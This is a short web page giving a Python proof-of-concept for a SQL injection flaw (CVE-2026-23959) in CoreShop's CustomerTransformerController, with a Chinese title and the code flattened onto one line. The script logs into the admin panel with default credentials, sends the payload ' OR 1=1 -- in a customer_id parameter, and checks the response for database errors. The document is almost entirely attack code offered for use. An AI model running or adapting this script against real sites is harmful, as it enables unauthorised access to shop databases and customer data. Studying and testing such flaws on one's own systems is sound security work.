CVE-2026-23959 CoreShop CustomerTransformerController SQL注入漏洞

import requests import sys target = sys.argv[1] if len(sys.argv) > 1 else 'http://localhost' # SQL Injection PoC for CVE-2026-23959 # Target: CoreShop CustomerTransformerController # Requires authenticated access to admin panel session = requests.Session() # Login to CoreShop admin panel login_url = f"{target}/admin/login" login_data = { '_username': 'admin', '_password': 'password' } # Login request session.post(login_url, data=login_data) # SQL Injection test payload vulnerable_endpoint = f"{target}/admin/customer-transformer/process" sql_payload = "' OR 1=1 --" params = { 'customer_id': sql_payload, 'action': 'transform' } response = session.get(vulnerable_endpoint, params=params) # Check for SQL error in response if 'SQLSTATE' in response.text or 'mysql' in response.text.lower(): print('[+] SQL Injection vulnerability confirmed!') print('[*] Database error detected in response') else: print('[-] No obvious SQL error detected')